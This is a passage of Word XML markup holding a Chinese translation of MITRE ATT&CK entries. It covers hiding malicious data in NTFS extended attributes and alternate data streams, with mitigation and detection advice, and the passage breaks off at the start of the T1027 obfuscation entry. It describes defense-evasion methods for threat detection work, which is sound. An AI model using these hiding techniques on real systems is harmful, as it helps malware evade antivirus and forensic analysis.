          <w:p w14:paraId="1164E6E9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于签名的检测、主机取证</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>分析</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、防病毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66FB3C01" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Red Canary</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Oddvar Moe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>@oddvarmoe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F39D784" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="204CBB32" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB6273C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>每个新技术文件系统（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）格式的分区都包含一个主文件表（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>MFT</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），它为分区上的每个文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录维护一个记录。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MFT</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>条目中是文件属性，如扩展属性（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和数据（存在不止一个数据属性时称为备用数据流（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ADSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）），可用于存储任意数据（甚至完整的文件）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790BF9DE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将恶意数据或二进制文件存储在文件属性元数据中，而不是直接存储在文件中。这可能是为了逃避一些防御措施，如静态指示扫描工具和防病毒。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7DA804" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3256"/>
        <w:gridCol w:w="6480"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="1CD6067E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7EA390B8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="63F3D8EE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="6378ECAE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59C3D60E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和目录权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48F7BF76" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请考虑调整</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>NTFS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>EA</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的读写权限。不过应该对其进行测试，以确保不会妨碍操作系统的常规操作。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="311CAEBF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34689F91" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE50C6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在用来识别</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>NTFS EA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中存储信息的取证技术。监控对</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>indows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ZwSetEaFile</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ZwQueryEaFile</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及对用于与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>EA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互的二进制文件的调用，并考虑定期扫描是否存在修改过的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2D8044" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有很多方法可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ADS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并与之交互。监控带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>冒号文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，复制等</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此语法（例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>file.ext:ads[.ext]</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）通常与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ADS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关联。对于可用于执行和创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ADS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的实用工具列表，请参阅</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS://GIST.GITHUBCOM/API0CRADLY/CDD2D0EC9ABB66F0E89306E27 7B8F</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189E7D5C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具可以打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ADSs</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>dir /r</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令也</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可以用来显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ADS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>许多</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Get-Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Set-Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Remove-Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Get-ChildItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）也可以接受</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>-stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数来与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ADSs</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133BDEEF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>混淆文件或信息</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7DE6EEDF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AE42640" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1027</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D9C64A1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13CD463D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="450C4C28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络协议分析、网络进程使用、文件监控、恶意软件逆向工程、二进制文件元数据、进程命令行参数、环境变量、进程监控、</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件日志、网络入侵检测系统、电子邮件网关、</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSL/TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03D264A4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机取证分析、基于签名的检测、主机入侵防御系统、应用白名单、进程白名单、日志分析、文件名或路径白名单</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="396B8D58" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Red Canary</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Christiaan Beek</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>@ChristiaanBeek</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E1A316C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F66DDEB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485C526B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能会试图通过加密、编码或其他方式混淆系统或传输中的内容，使得</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>难以发现或分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
